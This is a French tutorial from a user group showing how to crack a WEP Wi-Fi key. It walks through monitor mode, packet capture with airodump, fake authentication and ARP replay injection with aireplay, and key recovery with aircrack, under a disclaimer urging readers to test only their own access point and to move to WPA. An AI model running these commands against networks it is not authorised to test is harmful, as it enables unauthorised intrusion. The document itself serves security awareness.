Vuln´erabilit´e des r´eseaux Wifi: Comment cracker une cl´e WEP ? Avertissement ! Ce document est seulement r´ealis´e ` a un titre informatif. FSUGAr d´ecline toute responsabilit´e vis-`a-vis des utilisations faites avec des techniques expliqu´ees dans ce document. Nous rappelons n´eanmoins que s’introduire sur un r´eseau de mani`ere ill´egale (que ce soit un r´eseau prot´eg´e ou non) est passible de lourdes amendes (voire mˆeme de peine de prison). Dans ce document nous voulons juste montrer qu’il est tr`es simple de s’introduire sur un r´eseau ”prot´eg´e” par WEP et nous conseillons donc l’utilisation de cryptages plus sˆ urs comme le WPA. N’utilisez ces techniques que pour tester la s´ecurit´e de VOTRE Access Point.
Quelle distribution utiliser ? et quels logiciels ? N’importe quelle distribution pour autant que la carte wifi soit support´ee (ne pas oublier de patcher pour aireplay). Nous utiliserons un live-cd pour simplifier les choses. Les logiciels utilis´ es sont: Le live-cd Whax 3.0 : http://iwhax.net/ Kismet : http://www.kismetwireless.net/ aircrack, airodump, aireplay : http://www.cr0.net:8040/code/network/aircrack/ D´ emarche ` a suivre : Il suffit de booter sur le live-cd, se logguer (le mot de passe root est ”toor”) et ensuite choisir un environnement graphique : taper ”startx” pour KDE et ”flux” pour FluxBox. Lancer la ”Konsole”. Mettre la carte en mode monitor : iwconfig eth0 mode monitor Configurer kismet (sp´ecifier la bonne valeur pour source) : vi /etc/kismet.conf et ensuite : ifconfig eth0 up Lancer kismet : On peut voir les r´eseaux disponibles, on en choisit un et on note : L’ESSID :1`ere colonne Le channel : 4`eme colonne et Q pour quitter. On peut ensuite lancer airodump qui va capturer tous les packets (fsugar est le nom du fichier de sauvegarde et 6 le channel de l’AP dont on veut capturer les packets) : airodump eth0 fsugar 6 Dans la premi`ere colonne on a le BSSID de l’AP. On va maintenant enregistrer une fausse adresse MAC (0:1:2:3:4:5) dans la table ARP de l’AP : aireplay -1 0 -e ESSID -a BSSID -h 0:1:2:3:4:5 eth0
1
Ensuite on commence l’attaque : aireplay -3 -b BSSID -h 0:1:2:3:4:5 eth0 Il suffit de patienter quelques minutes et normalement le nombre de IVs captur´es par airodump devrait commencer `a augmenter rapidement. Lorsqu’on estime avoir assez d’IVs (genre 200.000 pour une cl´e 64bits) on peut lancer aircrack mˆeme si airodump continue de tourner : aircrack fsugar.cap L’option -n permet de sp´ecifier le nb de bits par exemple -n 64 pour une cl´e 64 bits). Et si tout va bien la cl´e WEP apparaˆıtra en quelques secondes, sinon il faut recommencer et capturer plus d’IVs :-) Document r´ealis´e par Gick [http://www.fsugar.be/]. Plus d’informations dans le tr`es bon document de hakin9 : http://www.hakin9.org/fr/attachments/format fr.pdf ´egalement disponible ` a l’adresse http://www.fsugar.be/docu/wifi/hakin9-n2-wifi.pdf
2